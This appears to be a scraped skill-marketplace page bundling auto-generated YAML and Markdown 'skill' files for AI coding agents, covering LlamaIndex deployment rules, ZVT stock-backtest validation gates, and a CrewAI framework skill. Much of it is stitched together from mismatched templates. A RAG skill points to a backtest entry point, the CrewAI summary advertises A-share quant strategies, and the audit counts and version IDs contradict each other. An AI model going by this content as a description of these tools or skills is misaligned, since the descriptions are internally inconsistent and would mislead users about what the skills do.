    kind: domain_rule
    modality: must_not
    consequence: null
  - id: '?'
    when: When subclassing BaseSynthesizer and considering how to access PromptHelper
    action: In your custom subclass, prefer prompt_helper = self._prompt_helper or Settings.prompt_helper (public attribute
      access). The base class's reach into _prompt_helper is a maintenance trap that depends on Settings's internals; a future
      refactor of Settings could break it without notice. Document any private-attribute reach with a comment explaining why.
    severity: low
    kind: domain_rule
    modality: should
    consequence: null
  - id: '?'
    when: When deploying LlamaIndex to production with audit/observability/SLA monitoring requirements
    action: Construct callback_manager = CallbackManager([LangFuseCallbackHandler(...)]) (or your chosen handler) and pass
      to Settings.callback_manager = ... before any index/query construction. Or pass to specific entry points like BaseIndex.from_documents(callback_manager=cm)
      and as_query_engine(callback_manager=cm). Audit that no code path constructs an index/query without referencing the
      configured callback_manager.
    severity: medium
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When scoping a new integration package (storage / vector store / reader / parser / postprocessor) and estimating
      implementation effort
    action: Before committing to writing a new BaseDocumentStore / BaseKVStore / BaseChatStore subclass, count the @abstractmethod
      members in the corresponding base file and budget at least 1-2 days per 5 methods (each needs unit-test coverage). For
      new readers / parsers / postprocessors (≤4 abstracts), 0.5-1 day is realistic. Validate the count by running grep '@abstractmethod'
      on the base file before estimating.
    severity: low
    kind: domain_rule
    modality: should
    consequence: null
  - id: '?'
    when: When deploying LlamaIndex in any environment that does not use OpenAI as the primary LLM provider
    action: 'At application startup, before any from llama_index.core import VectorStoreIndex / RetrieverQueryEngine / etc.:
      from llama_index.core import Settings; Settings.llm = <YourLLM>(model=''...'', ...); Settings.embed_model = <YourEmbedder>(model=''...'',
      ...). Verify by inspecting type(Settings.llm).__module__ — confirm it is your chosen provider''s module, not openai.
      Add a startup assertion: assert ''openai'' not in type(Settings.llm).__module__ for non-OpenAI deployments.'
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When promoting a prototype using the SimpleVectorStore default into a production deployment
    action: 'Install a persistent vector store integration: pip install llama-index-vector-stores-qdrant (or your chosen backend).
      Construct: vector_store = QdrantVectorStore(client=..., collection_name=...), storage_context = StorageContext.from_defaults(vector_store=vector_store),
      index = VectorStoreIndex.from_documents(docs, storage_context=storage_context). After switching, re-validate similarity_top_k
      and any similarity threshold by running a known-truth eval set; expect minor score-distribution drift requiring threshold
      re-tuning.'
    severity: medium
    kind: domain_rule
    modality: should_not
    consequence: null
  - id: '?'
    when: When changing the embedding model in a production deployment
    action: 'Plan embedder swap as a full re-index operation: (1) build a new index with the new embedder into a new storage_context
      (or new collection in the vector store); (2) point query traffic at the new index; (3) delete the old index after validating
      quality. Do NOT in-place swap Settings.embed_model on a populated index. For SemanticSplitter, swapping the splitter''s
      embedder requires re-parsing all source documents from scratch.'
    severity: high
    kind: domain_rule
    modality: should
    consequence: null
  - id: '?'
    when: When designing an ingestion pipeline where document metadata (categories, tags, ACL) may change independently of
      text content
    action: 'Either (a) subclass Document and override the hash property to include metadata fields you care about: hash =
      sha256((self.text + json.dumps(self.metadata, sort_keys=True)).encode()).hexdigest(); OR (b) bypass refresh_ref_docs
      for metadata changes — call index.delete_ref_doc(doc_id, delete_from_docstore=True) followed by index.insert(updated_doc).
      Verify by mutating a doc''s metadata, calling refresh_ref_docs, and asserting the doc was actually re-embedded.'
    severity: medium
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: '?'
    when: When constructing an IngestionPipeline with a docstore for any non-trivial ETL workflow
    action: 'Pass docstore_strategy explicitly: IngestionPipeline(transformations=..., docstore=docstore, docstore_strategy=DocstoreStrategy.UPSERTS)
      for replace-on-id semantics, or DocstoreStrategy.UPSERTS_AND_DELETE for full-sync semantics (input is the source of
      truth — anything not in input is deleted). Document the choice in code with a comment explaining why. Test by running
      pipeline.run() once with full input, then with reduced input, and asserting docstore state matches expectation.'
    severity: high
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: '?'
    when: When choosing AutoMergingRetriever for a workload to get parent-context expansion at retrieval time
    action: 'Use HierarchicalNodeParser upstream: nodes = HierarchicalNodeParser.from_defaults(chunk_sizes=[2048, 512, 128]).get_nodes_from_documents(docs);
      leaf_nodes = get_leaf_nodes(nodes); index = VectorStoreIndex(leaf_nodes, storage_context=storage_context_with_docstore_for_parents);
      retriever = AutoMergingRetriever(index.as_retriever(similarity_top_k=10), storage_context=...). Verify by inspecting
      node.relationships on a sample — confirm NodeRelationship.PARENT entries exist before relying on AutoMergingRetriever.'
    severity: medium
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When designing a multi-source ingestion pipeline where different readers produce documents with different metadata
      shapes
    action: 'Define a canonical metadata schema in caller code (e.g. a Pydantic model: class DocMetadata(BaseModel): source:
      str; ingested_at: datetime; tags: List[str]; ...). After each reader.load_data(), validate doc.metadata against the
      schema and reject/normalize on drift. Document required keys in a project-level metadata-schema.md. Without this discipline,
      metadata filters and postprocessors silently miss documents whose metadata doesn''t have the expected key.'
    severity: medium
    kind: domain_rule
    modality: should
    consequence: null
  - id: '?'
    when: When inspecting performance / tracing of a query engine pipeline that mixes sync entry methods with async server
      context
    action: 'Audit every call site: rg ''asyncio_run\('' in production dependencies; verify each is on a code path that''s
      only ever called from sync top-level (CLI tools, batch scripts) and NEVER from inside an async server. For async server
      deployments, use aquery / aretrieve / asynthesize end-to-end and avoid the sync wrappers entirely. Add CI assertion:
      in async server modules, no .query() or .retrieve() calls (use ruff custom rules or grep).'
    severity: medium
    kind: domain_rule
    modality: must
    consequence: null
output_validator:
  assertions:
  - id: OV-01
    check_predicate: all(p in inspect.getsource(zvt.factors.algorithm.macd) for p in ['slow=26', 'fast=12', 'n=9'])
    failure_message: 'FATAL: MACD params drifted from (fast=12, slow=26, n=9) — SL-08 violation, non-reproducible signals'
    business_meaning: Standard MACD parameters are a semantic lock; drift makes results incomparable with industry-standard
      indicators and non-reproducible.
    source_ids:
    - SL-08
    - BD-036
  - id: OV-02
    check_predicate: result.get('total_trades', 0) > 0 or result.get('explicit_zero_trade_ack') is True
    failure_message: Zero trades executed — likely missing pre-fetched data (see PC-02) or over-restrictive filters
    business_meaning: A backtest with zero trades is not a valid result; either data is missing or the strategy never triggered.
      Structural non-emptiness check is insufficient — we need business confirmation.
    source_ids:
    - SL-01
    - finance-C-073
  - id: OV-03
    check_predicate: result.get('annual_return') is None or abs(float(result['annual_return'])) <= 5.0
    failure_message: 'FATAL: |annual_return| > 500% — likely look-ahead bias or data error'
    business_meaning: Annual returns exceeding 500% are physically implausible for A-share strategies; indicates look-ahead
      bias or corrupt data.
    source_ids: []
  - id: OV-04
    check_predicate: result.get('holding_change_pct') is None or abs(float(result['holding_change_pct'])) <= 1.0
    failure_message: 'FATAL: |holding_change_pct| > 100% — physically impossible'
    business_meaning: Holding change percentage cannot exceed 100%; violation indicates position accounting error.
    source_ids:
    - BD-029
  - id: OV-05
    check_predicate: result.get('max_drawdown') is None or abs(float(result['max_drawdown'])) <= 1.0
    failure_message: 'FATAL: |max_drawdown| > 100% — impossible for non-leveraged account'
    business_meaning: Maximum drawdown cannot exceed 100% without leverage; violation indicates calculation error or look-ahead
      bias.
    source_ids: []
  - id: OV-06
    check_predicate: not (hasattr(result, 'trade_log') and result.trade_log and any(result.trade_log[i].action == 'sell' and
      i+1 < len(result.trade_log) and result.trade_log[i+1].action == 'buy' and result.trade_log[i].timestamp == result.trade_log[i+1].timestamp
      for i in range(len(result.trade_log)-1)))
    failure_message: 'FATAL: buy-before-sell detected in same cycle — SL-01 violation, creates implicit leverage'
    business_meaning: SL-01 requires sell() before buy() in each cycle; violation means available_long was not updated before
      buying, risking duplicate positions.
    source_ids:
    - SL-01
  scaffold:
    validate_py_path: '{workspace}/validate.py'
    tail_block: "# === DO NOT MODIFY BELOW THIS LINE ===\nif __name__ == \"__main__\":\n    result = run_backtest()\n    from\
      \ validate import enforce_validation\n    enforce_validation(result, output_path=\"{workspace}/result.csv\")\n# ===\
      \ END DO NOT MODIFY ==="
  enforcement_protocol: 1. Never edit validate.py. 2. Never delete the DO NOT MODIFY tail block from the main script. 3. Never
    wrap enforce_validation() in try/except. 4. Never rewrite result write logic — it MUST go through enforce_validation.
    5. If validate.py raises ImportError, fix the dependency, do not remove the call.
acceptance:
  hard_gates:
  - id: G1
    check: '{workspace}/result.csv exists AND file size > 0'
    on_fail: Strategy did not produce output; check run_backtest() return value and enforce_validation() call
  - id: G2
    check: '{workspace}/result.csv.validation_passed marker file exists'
    on_fail: Validation did not complete; review validate.py output and fix assertion failures
  - id: G3
    check: 'Main script contains literal: from validate import enforce_validation'
    on_fail: Validation chain stripped; re-add the import in the DO NOT MODIFY block
  - id: G4
    check: 'Main script contains literal: # === DO NOT MODIFY BELOW THIS LINE ==='
    on_fail: Validation fence removed; regenerate DO NOT MODIFY tail block
  - id: G5
    check: 'result.csv has at least 1 row: pandas.read_csv(result.csv).shape[0] >= 1'
    on_fail: Empty result; check if trade_log is non-empty and factors generated signals. Confirm PC-02 (k-data exists) passed.
  - id: G6
    check: 'If MACD strategy: source contains ''slow=26'' AND ''fast=12'' AND ''n=9'' in algorithm call'
    on_fail: MACD params drifted from SL-08 lock; restore standard (12, 26, 9)
  - id: G7
    check: 'For data pipeline tasks: result.csv contains ''entity_id'' and ''timestamp'' fields'
    on_fail: Missing required columns; check Mixin.query_data return schema and DataFrame MultiIndex reset_index() before
      writing
  - id: G8
    check: 'OV-03 passes: abs(annual_return) <= 5.0 (500%)'
    on_fail: Physical plausibility check failed; investigate look-ahead bias or data corruption in input kdata
  soft_gates:
  - id: SG-01
    rubric: 'Strategy narrative consistency: user intent aligns with generated strategy.py logic. dim_a: signal direction
      (buy/sell) matches intent [1-5, pass>=4]; dim_b: frequency (daily/intraday) aligns [1-5, pass>=4]; dim_c: risk controls
      match user intent [1-5, pass>=4].'
  - id: SG-02
    rubric: 'Factor combination quality. dim_a: no highly correlated factor duplication [1-5, pass>=4]; dim_b: multi-period
      alignment correct [1-5, pass>=4]; dim_c: liquidity filter present for A-share [1-5, pass>=4].'
  - id: SG-03
    rubric: 'Data source selection appropriateness. dim_a: coverage sufficient for target entities [1-5, pass>=4]; dim_b:
      provider latency acceptable for strategy frequency [1-5, pass>=4]; dim_c: no unauthorized provider used without credentials
      [1-5, pass>=4].'
skill_crystallization:
  trigger: all_hard_gates_passed AND user_opt_out_skill_saving != true
  output_path_template: '{workspace}/../skills/{slug}.skill'
  slug_template: '{blueprint_id_short}-{uc_id_lower}'
  captured_fields:
  - name
  - intent_keywords
  - entry_point_script
  - validate_script
  - fatal_constraints
  - spec_locks
  - preconditions
  - install_recipes
  - human_summary_translated
  action: 'After all Hard Gates PASS, resolve slug via slug_template using the executed UC, then write the .skill YAML file
    at output_path_template. Notify user in their detected locale: ''Skill saved as {slug}.skill — next time say one of {sample_triggers}
    from the matched UC to invoke directly.'''
  violation_signal: All hard gates passed but no .skill file exists at expected path
  skill_file_schema:
    name: finance-bp-135 / Standard RAG over local files
    version: v6.1
    intent_keywords:
    - RAG
    - VectorStoreIndex
    - from_documents
    - as_query_engine
    entry_point: run_backtest
    fatal_guards:
    - SL-01
    - SL-02
    - SL-03
    - SL-04
    - SL-05
    - SL-06
    - SL-07
    - SL-08
    - SL-10
    - SL-11
    - SL-12
    spec_locks:
    - SL-01
    - SL-02
    - SL-03
    - SL-04
    - SL-05
    - SL-06
    - SL-07
    - SL-08
    - SL-09
    - SL-10
    - SL-11
    - SL-12
    preconditions:
    - PC-01
    - PC-02
    - PC-03
    - PC-04
post_install_notice:
  trigger: skill_installation_complete
  message_template:
    positioning: I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow.
    capability_catalog:
      group_strategy:
        source: auto_grouped
        strategy_reason: auto-grouped by UC.type (3 distinct values, balanced distribution)
      groups:
      - group_id: complete_strategy
        name: Complete Strategy
        description: ''
        emoji: 📦
        uc_count: 12
        ucs:
        - uc_id: UC-001
          name: Standard RAG over local files
          short_description: Index a local document collection and answer free-text questions over it
          sample_triggers:
          - RAG
          - VectorStoreIndex
          - from_documents
        - uc_id: UC-002
          name: Hybrid (dense + sparse) retrieval with QueryFusionRetriever
          short_description: Improve recall by combining BM25 + dense vectors; fuse rankings with RRF / RSF / DBSF / SIMPLE
          sample_triggers:
          - hybrid
          - fusion
          - RRF
        - uc_id: UC-003
          name: Sub-question decomposition over multi-doc corpus
          short_description: Decompose complex questions into sub-questions, run each against a separate doc/index, synthesize
          sample_triggers:
          - sub-question
          - decomposition
          - multi-doc
        - uc_id: UC-004
          name: Auto-merging retrieval with hierarchical chunks
          short_description: Retrieve fine-grained chunks for precision, then merge to parents for context
          sample_triggers:
          - auto-merging
          - hierarchical
          - parent-child
        - uc_id: UC-005
          name: Function-calling agent with tool-equipped LLM (workflow-based)
          short_description: Build an agent that picks tools and chains tool calls to answer queries
          sample_triggers:
          - agent
          - function calling
          - tool
        - uc_id: UC-006
          name: Multi-agent workflow with specialized agents
          short_description: Coordinate multiple specialized agents (researcher, writer, critic) via event-based handoffs
          sample_triggers:
          - multi-agent
          - AgentWorkflow
          - handoff
        - uc_id: UC-007
          name: Property graph index for structured knowledge extraction
          short_description: Extract entities and relations from text, query as a graph
          sample_triggers:
          - knowledge graph
          - property graph
          - entity extraction
        - uc_id: UC-008
          name: RAG over SQL databases with NL→SQL
          short_description: Answer questions that span structured (SQL) and unstructured (vector) data
          sample_triggers:
          - SQL
          - NLSQL
          - text2sql
        - uc_id: UC-009
          name: Custom workflow with checkpointing and human-in-the-loop
          short_description: Build long-running pipelines with state, parallel branches, and pause-for-human points
          sample_triggers:
          - workflow
          - checkpoint
          - human-in-the-loop
        - uc_id: UC-010
          name: Citation-tracked RAG
          short_description: Generate answers with inline citations to source nodes/passages
          sample_triggers:
          - citation
          - source attribution
          - footnote
        - uc_id: UC-011
          name: Query transformations (HyDE, multi-step decomposition)
          short_description: Rewrite/expand the query before retrieval for higher recall
          sample_triggers:
          - HyDE
          - multi-step
          - query rewrite
        - uc_id: UC-012
          name: Document summarization index
          short_description: Pre-summarize each document, retrieve via summary, answer with full text
          sample_triggers:
          - document summary
          - summary index
          - DocumentSummaryIndex
      - group_id: data_pipeline
        name: Data Pipeline
        description: ''
        emoji: 📊
        uc_count: 1
        ucs:
        - uc_id: UC-013
          name: Ingestion pipeline with cache and dedup
          short_description: ETL — documents → nodes → embeddings → vector store, with hash-based dedup and cache
          sample_triggers:
          - ingestion
          - pipeline
          - ETL
      - group_id: extension_example
        name: Extension Example
        description: ''
        emoji: 📦
        uc_count: 2
        ucs:
        - uc_id: UC-014
          name: Custom node postprocessor / reranker
          short_description: Rerank or filter retrieved nodes before sending to LLM
          sample_triggers:
          - rerank
          - postprocess
          - MMR
        - uc_id: UC-015
          name: Structured output with Pydantic / Output parsers
          short_description: Force LLM output to conform to a Pydantic schema for downstream consumption
          sample_triggers:
          - pydantic
          - structured output
          - JSON mode
    call_to_action: Tell me which one you want to try.
    featured_entries:
    - uc_id: UC-001
      beginner_prompt: Try standard rag over local files
      auto_selected: true
    - uc_id: UC-002
      beginner_prompt: Try hybrid (dense + sparse) retrieval with queryfusionretriever
      auto_selected: true
    - uc_id: UC-003
      beginner_prompt: Try sub-question decomposition over multi-doc corpus
      auto_selected: true
    more_info_hint: Ask me 'what else can you do?' to see all 15 capabilities.
  locale_rendering:
    instruction: On skill_installation_complete, translate ALL user-facing strings (positioning + capability_catalog.groups[].name
      + capability_catalog.groups[].description + capability_catalog.groups[].ucs[].short_description + call_to_action + featured_entries[].beginner_prompt
      + more_info_hint) into detected user locale per locale_contract. Preserve UC-IDs, group_id, emoji, and sample_triggers
      verbatim.
    preserve_verbatim:
    - UC-IDs
    - group_id
    - emoji
    - sample_triggers
    - technical_class_names
  enforcement:
    action: 'Host agent MUST send composed message to user as the FIRST user-facing response after skill_installation_complete
      event. Message MUST contain: positioning, capability_catalog (rendered as markdown tables per group), 3 featured_entries,
      call_to_action, and more_info_hint.'
    violation_code: PIN-01
    violation_signal: First user-facing message post-install does not contain the full capability_catalog (all UCs grouped)
      OR skips featured_entries OR skips call_to_action.
human_summary:
  persona: Doraemon
  what_i_can_do:
    tagline: 'I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow. Just tell me
      what you want; I''ll write the code, you don''t have to dig docs. (Heads up: ZVT natively supports A-share, HK, and
      crypto. US stocks — stockus_nasdaq_AAPL — are half-baked; don''t bother for serious work.)'
    use_cases:
    - Sub-question decomposition over multi-doc corpus
    - Hybrid (dense + sparse) retrieval with QueryFusionRetriever
    - Standard RAG over local files
    - A-share MACD daily golden-cross backtest with hfq price adjustment from eastmoney
    - 'End-to-end ZVT pipeline: FinanceRecorder + GoodCompanyFactor + StockTrader'
    - Multi-factor strategy with TargetSelector (AND mode) combining MACD + volume breakout
    - Index composition data collection (SZ1000, SZ2000) with EM recorder
  what_i_auto_fetch:
  - ZVT stage pipeline structure (data_collection → visualization) from LATEST.yaml
  - Semantic locks (SL-01 through SL-12) — especially sell-before-buy ordering and MACD params
  - Fatal constraints (finance-C-*) relevant to your target strategy type
  - 'Default parameters: MACD(12,26,9), hfq adjustment, buy_cost=0.001, base_capital=1M CNY'
  - Entity ID format (stock_sh_600000) and DataFrame MultiIndex convention
  - Provider-specific recorder class names and required class attributes
  what_i_ask_you:
  - 'Target market: A-share (default), HK, or crypto? (US stocks in ZVT are half-baked — stockus_nasdaq_AAPL exists but coverage
    is thin)'
  - 'Data source / provider: eastmoney (free, no account), joinquant (account+paid), baostock (free, good history), akshare,
    or qmt (broker)?'
  - 'Strategy type: MACD golden-cross, MA crossover, volume breakout, fundamental screen, or custom factor?'
  - 'Time range: start_timestamp and end_timestamp for backtest period'
  - 'Target entity IDs: specific stocks (stock_sh_600000) or index components (SZ1000)?'
  locale_rendering:
    instruction: On first user contact, translate all fields above into detected user locale while preserving Doraemon persona
      (direct, frank, mildly snarky, knows limits).
    preserve_verbatim:
    - BD-IDs
    - SL-IDs
    - UC-IDs
    - finance-C-IDs
    - class_names
    - function_names
    - file_paths
    - numeric_thresholds

ClawHub Coding Backend+2

T@clawhub-tangweigang-jpg-8679fec286

Crewai Multi Agent

Skill

CrewAI 多智能体框架：role-goal-backstory 声明智能体，sequential / hierarchical 双流程，ReAct 与 OpenAI native function-calling 双 tool 循环，统一 Memory + 5 个原生 LLM provider + Lit C...

---
name: crewai-multi-agent
description: |-
  CrewAI 多智能体框架：role-goal-backstory 声明智能体，sequential / hierarchical 双流程，ReAct 与 OpenAI native function-calling 双 tool 循环，统一 Memory + 5 个原生 LLM provider + Lit
  CrewAI multi-agent framework: role-goal-backstory agent declaration, sequential / hierarchical execution processes, dual tool-call loops (ReAct + OpenAI native function-calling), unified Memory layer, 5 native LLM providers + LiteLLM fallback.
license: MIT-0
compatibility: AI engineering knowledge skill — host AI consumes seed.yaml directly. No installation required.
metadata:
  version: "v0.1.0"
  blueprint_id: "finance-bp-134"
  blueprint_source: "joaomdmoura/crewAI"
  blueprint_commit: "cb46a1c4babef8c51db6499d7a81f2c36b01bdef"
  category: ai-engineering
  doramagic_url: "https://doramagic.ai/zh/crystal/crewai-multi-agent"
  openclaw:
    skillKey: crewai-multi-agent
    category: ai-engineering
    primaryEnv: knowledge
---
# 这个 skill 适合什么用户？能做哪些任务？

## 概览

CrewAI 是构建多智能体 LLM 应用的 Python 框架（github.com/joaomdmoura/crewAI）。核心特征：role-goal-backstory 智能体声明，两种执行流程（sequential / hierarchical 含 auto- 或自定义 manager），双 tool-call 循环（ReAct 文本解析 vs OpenAI 原生 function-calling，运行时特征探测选择），统一 Memory 层（Memory + MemorySlice + RecallFlow，自适应深度召回），可插拔 LLM provider 路由（5 个原生 SD...

**Doramagic 晶体页**: https://doramagic.ai/zh/crystal/crewai-multi-agent

## 知识规模

- **56 条约束** (5 fatal + 51 non-fatal)
- 上游源码: `joaomdmoura/crewAI` @ commit `cb46a1c4`
- 蓝图 ID: `finance-bp-134`

## 用法

Host AI（Claude Code / Cursor / OpenClaw）读 `references/seed.yaml`，按其中的：
- `intent_router` 匹配用户意图
- `architecture` 理解项目架构
- `constraints` 应用 anti-pattern 约束
- `business_decisions` 参考核心设计决策

## FAQ 摘要

### 这个 skill 适合什么用户？能做哪些任务？
适合需要多 agent 协作完成复杂任务的工程师：研究 + 写作 + 校对、数据采集 + 分析 + 报告、销售线索挖掘 + 跟进等。两种流程满足不同需求：sequential 适合明确流水线，hierarchical 适合需要 manager 调度的开放任务。访问 doramagic.ai/r/crewai 查看完整用例。

### 需要准备什么环境？依赖什么？
Python（版本见 pyproject.toml），至少一个 LLM provider（Memory 默认 OpenAI gpt-4o-mini；Crew agent 各自挑 llm）。Memory 启用时默认 OpenAIEmbeddingFunction 嵌入 + lancedb 向量库。如需走非原生 SDK 模型，安装 LiteLLM。空气墙 / 数据驻留场景必须 ENV 关闭遥测。

### 会踩哪些坑？这个 skill 怎么防护？
本 skill 内置 56 条约束（5 条 fatal）。典型踩坑：(1) aggregate_raw_outputs_from_task_outputs 无 token cap，长任务链溢出 LLM 上下文；(2) tool 重复使用检测只比 last_used_tool，A→B→A→B 振荡漏检；

---

完整文档: 见 `references/seed.yaml` (v6.1 schema). 浏览页: https://doramagic.ai/zh/crystal/crewai-multi-agent

FILE:human_summary.md
# finance-bp-134-v6.1 — Human Summary

**Persona**: Doraemon

> I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow. Just tell me what you want; I'll write the code, you don't have to dig docs. (Heads up: ZVT natively supports A-share, HK, and crypto. US stocks — stockus_nasdaq_AAPL — are half-baked; don't bother for serious work.)

## What I Can Do

- Game Builder Crew
- Job Posting Generation
- Marketing Strategy Multi-agent
- A-share MACD daily golden-cross backtest with hfq price adjustment from eastmoney
- End-to-end ZVT pipeline: FinanceRecorder + GoodCompanyFactor + StockTrader
- Multi-factor strategy with TargetSelector (AND mode) combining MACD + volume breakout
- Index composition data collection (SZ1000, SZ2000) with EM recorder

## What I Auto-Fetch

- ZVT stage pipeline structure (data_collection → visualization) from LATEST.yaml
- Semantic locks (SL-01 through SL-12) — especially sell-before-buy ordering and MACD params
- Fatal constraints (finance-C-*) relevant to your target strategy type
- Default parameters: MACD(12,26,9), hfq adjustment, buy_cost=0.001, base_capital=1M CNY
- Entity ID format (stock_sh_600000) and DataFrame MultiIndex convention
- Provider-specific recorder class names and required class attributes

## What I Ask You

- Target market: A-share (default), HK, or crypto? (US stocks in ZVT are half-baked — stockus_nasdaq_AAPL exists but coverage is thin)
- Data source / provider: eastmoney (free, no account), joinquant (account+paid), baostock (free, good history), akshare, or qmt (broker)?
- Strategy type: MACD golden-cross, MA crossover, volume breakout, fundamental screen, or custom factor?
- Time range: start_timestamp and end_timestamp for backtest period
- Target entity IDs: specific stocks (stock_sh_600000) or index components (SZ1000)?

## Locale Rendering

**Instruction**: On first user contact, translate all fields above into detected user locale while preserving Doraemon persona (direct, frank, mildly snarky, knows limits).

**Preserve verbatim**: BD-IDs, SL-IDs, UC-IDs, finance-C-IDs, class_names, function_names, file_paths, numeric_thresholds

---

*Generated by compile_crystal_skeleton.py v5.0 for finance-bp-134-v6.1*
*All content is English source — agent translates on first user contact.*
FILE:references/seed.yaml
meta:
  id: finance-bp-134-v6.1
  version: v6.1
  blueprint_id: finance-bp-134
  sop_version: crystal-compilation-v6.1
  source_language: en
  compiled_at: '2026-04-25T09:19:03.560558+00:00'
  target_host: openclaw
  authoritative_artifact:
    primary: seed.yaml
    non_authoritative_derivatives:
    - SKILL.md (host-generated summary, may lag)
    - HEARTBEAT.md (host telemetry)
    - memory/*.md (host conversational memory)
    rule: On any behavioral decision (preconditions check, OV assertion, EQ rule firing, spec_lock verification), agents MUST
      re-read seed.yaml. Derivatives are for UI display only and may be out-of-date.
  execution_protocol:
    install_trigger:
    - Execute resources.host_adapter.install_recipes[] in declared order
    - Verify each package with import check before proceeding
    execute_trigger: When user intent matches intent_router.uc_entries[].positive_terms AND user uses action verb (run/execute/跑/执行/backtest/fetch/collect)
    on_execute:
    - Reload seed.yaml (do not rely on SKILL.md or cached summaries)
    - Run preconditions[] in declared order; halt on first fatal failure with on_fail message to user
    - Enter context_state_machine.CA1_MEMORY_CHECKED state
    - Evaluate evidence_quality.enforcement_rules[]; prepend user_disclosure_template
    - Translate user_facing_fields to user locale per locale_contract
    workspace_resolution:
      scripts_path: '{host_workspace}/scripts/'
      skills_path: '{host_workspace}/skills/'
      trace_path: '{host_workspace}/.trace/'
locale_contract:
  source_language: en
  user_facing_fields:
  - human_summary.what_i_can_do.tagline
  - human_summary.what_i_can_do.use_cases[]
  - human_summary.what_i_auto_fetch[]
  - human_summary.what_i_ask_you[]
  - evidence_quality.user_disclosure_template
  - post_install_notice.message_template.positioning
  - post_install_notice.message_template.capability_catalog.groups[].name
  - post_install_notice.message_template.capability_catalog.groups[].description
  - post_install_notice.message_template.capability_catalog.groups[].ucs[].name
  - post_install_notice.message_template.capability_catalog.groups[].ucs[].short_description
  - post_install_notice.message_template.call_to_action
  - post_install_notice.message_template.featured_entries[].beginner_prompt
  - post_install_notice.message_template.more_info_hint
  - preconditions[].description
  - preconditions[].on_fail
  - intent_router.uc_entries[].name
  - intent_router.uc_entries[].ambiguity_question
  - architecture.pipeline
  - architecture.stages[].narrative.does_what
  - architecture.stages[].narrative.key_decisions
  - architecture.stages[].narrative.common_pitfalls
  - constraints.fatal[].consequence
  - constraints.regular[].consequence
  - output_validator.assertions[].failure_message
  - acceptance.hard_gates[].on_fail
  - skill_crystallization.action
  locale_detection_order:
  - explicit_user_declaration
  - first_message_language
  - system_locale
  translation_enforcement:
    trigger: on_first_user_message
    action: Render user_facing_fields in detected locale, preserving all IDs (BD-/SL-/UC-/finance-C-) and code identifiers
      verbatim
    violation_code: LOCALE-01
    violation_signal: User receives untranslated English Human Summary when detected locale != en
evidence_quality:
  declared:
    evidence_coverage_ratio: null
    evidence_verify_ratio: null
    evidence_invalid: 0
    evidence_verified: null
    evidence_auto_fixed: null
    audit_coverage: 20 finance-universal not_applicable + 6 AIL items reviewed (1 NA + 4 warn + 1 fail) + 5 DAT items reviewed
      (1 pass + 3 warn + 1 fail) = 31 items reviewed across applicable scope
    audit_pass_rate: 1/11 (9% applicable items pass; 10 warn/fail/missing capture the architectural boundaries and divergences
      worth surfacing as constraints)
    audit_fail_total: 0
    audit_finance_universal:
      pass: 0
      warn: 0
      fail: 0
    audit_subdomain_totals:
      pass: 0
      warn: 0
      fail: 0
  enforcement_rules:
  - id: EQ-01
    trigger: declared.evidence_verify_ratio < 0.5
    action: MUST invoke traceback lookup for all cited BD-IDs in output before emitting business code — read LATEST.yaml sections
      for each BD referenced
    violation_code: EQ-01-V
    violation_signal: Generated script references BD-IDs but no tool_call to read LATEST.yaml preceded code generation
  - id: EQ-02
    trigger: always
    action: MUST prepend user_disclosure_template (translated to user locale) to first user-facing response
    violation_code: EQ-02-V
    violation_signal: First agent response to user does not contain audit warning phrase
  user_disclosure_template: '[QUALITY NOTICE] This crystal was compiled from blueprint finance-bp-134. Evidence verify ratio
    = 0.0% and audit fail total = 0. Generated results may have uncaptured requirement gaps. Verify critical decisions against
    source files (LATEST.yaml / LATEST.jsonl).'
traceback:
  source_files:
    blueprint: LATEST.yaml
    constraints: LATEST.jsonl
  mandatory_lookup_scenarios:
  - id: TB-01
    condition: Two constraints have apparently conflicting enforcement rules
    lookup_target: LATEST.jsonl — find both constraint IDs, compare `consequence` + `evidence_refs` to determine priority
  - id: TB-02
    condition: A business decision rationale is unclear or disputed
    lookup_target: LATEST.yaml — locate BD-ID under business_decisions, read `rationale` + `alternative_considered` fields
  - id: TB-03
    condition: evidence_invalid > 0 in evidence_quality.declared
    lookup_target: LATEST.yaml _enrich_meta — cross-check specific BD `evidence_refs` fields for invalid markers
  - id: TB-04
    condition: User asks where a rule comes from
    lookup_target: LATEST.jsonl — find constraint by ID, read `confidence.evidence_refs` for source file + line number
  - id: TB-05
    condition: Generated code does not match expected ZVT API behavior
    lookup_target: LATEST.yaml stages[].required_methods — verify method signature and evidence locator in source code
  degraded_lookup:
    no_fs_access: 'Ask the user to paste the relevant LATEST.yaml section or LATEST.jsonl lines for the BD-/finance-C- IDs
      in question. Crystal ID: finance-bp-134-v5.0.'
trace_schema:
  event_types:
  - precondition_check
  - spec_lock_check
  - evidence_rule_fired
  - evidence_rule_skipped
  - locale_translation_emitted
  - hard_gate_passed
  - hard_gate_failed
  - skill_emitted
  - false_completion_claim
preconditions:
- id: PC-01
  description: zvt package installed and importable
  check_command: python3 -c 'import zvt; print(zvt.__version__)'
  on_fail: 'Run: python3 -m pip install zvt  then re-run: python3 -m zvt.init_dirs to initialize data directories'
  severity: fatal
- id: PC-02
  description: K-data exists for target entities (required before backtesting)
  check_command: python3 -c "from zvt.api.kdata import get_kdata; df = get_kdata(entity_ids=['stock_sh_600000'], limit=1);
    assert df is not None and len(df) > 0, 'No kdata found'"
  on_fail: 'Run recorder first: python3 -m zvt.recorders.em.em_stock_kdata_recorder --entity_ids stock_sh_600000  (replace
    with your target entity IDs)'
  severity: fatal
  applies_to_uc: []
- id: PC-03
  description: ZVT data directory initialized (~/.zvt or ZVT_HOME)
  check_command: 'python3 -c "import os; from pathlib import Path; zvt_home = Path(os.environ.get(''ZVT_HOME'', Path.home()
    / ''.zvt'')); assert zvt_home.exists(), f''ZVT home not found: {zvt_home}''"'
  on_fail: 'Run: python3 -m zvt.init_dirs'
  severity: fatal
- id: PC-04
  description: SQLite write permission for ZVT data directory
  check_command: python3 -c "import os, tempfile; from pathlib import Path; zvt_home = Path(os.environ.get('ZVT_HOME', Path.home()
    / '.zvt')); test_f = zvt_home / '.write_test'; test_f.touch(); test_f.unlink()"
